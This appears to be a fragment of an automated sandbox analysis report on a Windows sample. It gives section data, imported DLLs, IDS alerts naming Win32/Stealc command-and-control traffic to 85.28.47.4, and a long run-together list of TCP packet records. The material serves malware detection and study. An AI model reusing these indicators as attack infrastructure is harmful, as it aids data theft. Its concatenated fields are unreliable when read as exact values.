                                            0x2370000x50000x200019bdedf97a282b8124aef3364f1d5beaFalse0.9893798828125data7.955332931380237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            0x23c0000x7830000x32800232577270f63f0df7e854ade1a190914unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .data0x9bf0000x2140000x213c00b87b1c708664d63617d6fb87b28d34a3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            DLLImport
                                            kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                            user32.dllMessageBoxA
                                            advapi32.dllRegCloseKey
                                            oleaut32.dllSysFreeString
                                            gdi32.dllCreateFontA
                                            shell32.dllShellExecuteA
                                            version.dllGetFileVersionInfoA
                                            msvcrt.dllstrncpy
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            07/02/24-08:26:19.712933TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C26388080192.168.2.485.28.47.4
                                            07/02/24-08:26:18.793216TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in6388080192.168.2.485.28.47.4
                                            07/02/24-08:26:19.532971TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C26388080192.168.2.485.28.47.4
                                            07/02/24-08:26:19.711322TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1806388085.28.47.4192.168.2.4
                                            07/02/24-08:26:19.892678TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1806388085.28.47.4192.168.2.4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 2, 2024 08:26:18.788017035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:18.792958975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:18.793040991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:18.793215990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:18.798394918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.531388044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.531564951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.532970905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.537749052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.711322069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.711338997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.711500883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.712933064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.717662096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892678022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892702103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892714024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892754078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.892780066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.892790079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892802000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:19.892838001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.928910971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:19.933983088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.107259989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.107393026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:20.150187969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:20.150264025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:20.155011892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.155109882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.155123949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.155133963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.155256033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.155263901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.945147991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:20.945241928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.217550039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.222621918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394440889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394474983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394484997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394495010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394556999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394567013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394577980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394598007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.394656897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.394712925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.394754887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.395313978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.395333052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.395348072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.395360947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.395402908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.395755053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.395787954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.395806074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.395828962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.476639986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476689100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476702929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476720095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476739883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.476778984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.476857901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476878881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.476919889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.476950884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.477067947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.477108955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.477118969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.477155924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483068943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483130932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483158112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483170986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483210087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483225107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483251095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483263016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483298063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483333111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483453035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483501911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483530998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483544111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483577013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483633041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483650923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483664036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.483697891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.483709097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484311104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484357119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484366894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484369993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484395981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484412909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484666109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484718084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484733105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484744072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484781027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484814882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484863997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484874964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.484906912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.484918118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.485526085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.485588074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.558969975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.558980942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559062958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.559132099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559191942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.559216976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559226990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559256077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.559370995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559380054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559391022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.559412003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.559437990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.566709995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.566726923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.566737890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.566766024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.566787958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.566812992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.566883087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567003965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.567058086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567069054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567080021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567116976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.567142010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.567235947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567246914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567256927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.567287922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.567393064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.568531990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.568551064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.568562031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.568591118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.568608046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573024035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573085070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573173046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573223114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573348045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573364019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573390007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573406935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573410034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573455095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573601007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573611021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573621035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.573651075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.573673964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.574218035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574228048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574238062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574276924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.574443102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574455023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574465990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.574496984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.574512959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.575243950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575254917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575265884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575297117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.575320005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.575397968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575449944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.575557947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575570107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.575607061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.576242924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576261044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576272011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576294899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.576313972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.576420069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576431036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576441050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.576472044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.576488018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.577197075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.577218056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.577248096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.577259064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.577366114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.577377081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.577415943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.641144037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.641222954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.641232014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.641241074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.641254902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.641277075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.641326904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.647751093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.647844076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.647865057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.647875071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.647923946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.647934914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.647942066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.647942066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.647962093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.647983074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654371023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654443026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654452085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654505014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654553890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654553890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654553890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654614925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654624939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654633999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654642105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654645920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654664993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654691935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654859066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654870033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654880047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.654903889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.654934883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.655196905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655278921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655288935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655390024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655399084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655415058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655441046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.655469894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.655570984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655581951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655594110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.655616999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.655643940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.656052113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.656111956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.656114101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.656148911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.660798073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660928011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660942078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660952091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660963058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660969019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.660970926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661005020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661032915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661046982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661060095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661066055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661114931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661143064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661248922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661258936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661266088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661292076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661314964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661778927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661820889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661823034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661832094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661856890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661878109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.661947966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661958933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661969900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.661982059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662010908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662102938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662113905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662141085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662164927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662651062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662661076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662671089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662703991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662731886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662739992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662750006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.662781000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.662791014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663053989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663098097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663115978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663126945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663146019 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663163900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663248062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663258076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663268089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663278103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663281918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663302898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663326979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663476944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663489103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.663517952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.663538933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664024115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664069891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664069891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664081097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664113045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664191961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664202929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664208889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664238930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664254904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664346933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664356947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664366961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664386034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664402008 CEST6388080192.168.2.485.28.47.4
